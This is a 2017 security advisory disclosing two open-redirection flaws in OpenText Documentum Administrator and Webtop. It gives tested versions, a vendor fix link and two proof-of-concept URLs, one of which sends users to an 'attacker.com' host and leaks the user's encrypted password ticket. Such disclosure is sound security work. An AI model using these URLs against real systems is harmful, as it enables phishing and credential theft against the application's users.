OpenText Documentum Administrator / Webtop Open Redirection

2017-09-27T00:00:00
ID PACKETSTORM:144363
Type packetstorm
Reporter Jakub Palaczynski
Modified 2017-09-27T00:00:00

Description

                                        
                                            `Title: OpenText Documentum Administrator and Webtop - Open Redirection  
Author: Jakub Palaczynski  
Date: 24. September 2017  
CVE (Administrator): CVE-2017-14524  
CVE (Webtop): CVE-2017-14525  
  
Affected software:  
==================  
Documentum Administrator  
Documentum Webtop  
  
Exploit was tested on:  
======================  
Documentum Administrator version 7.2.0180.0055  
Documentum Webtop version 6.8.0160.0073  
Other versions may also be vulnerable.  
  
Open Redirection - 2 instances:  
========================  
  
Please note that examples below are for Documentum Administrator, but  
the same exploitation takes place in Webtop.  
  
1. First instance:  
It is possible to frame custom/malicious website on a trusted domain.  
This way an attacker may for example steal credentials via creating  
fake login form or redirect users to a malicious website.  
  
Proof of Concept:  
https://DOCUMENTUM/xda/help/en/default.htm?startat=//127.0.0.1/custom.html  
  
2. Second instance:  
It is possible to redirect user to custom website. Besides redirection  
it also allows for stealing sensitive data - before redirection takes  
place application appends username and base64 encoded user's encrypted  
password ("ticket" parameter).  
  
Proof of Concept:  
Please note that PoC below works only in Internet Explorer browser as  
only this browser treats /%09/ as //, which makes redirection work.  
https://DOCUMENTUM/xda/component/virtuallinkconnect?redirectUrl=%2F%09%2Fattacker.com%2F&virtualLinkPath=%2F  
  
Fix:  
===  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
======  
Jakub[dot]Palaczynski[at]gmail[dot]com  
  
  
`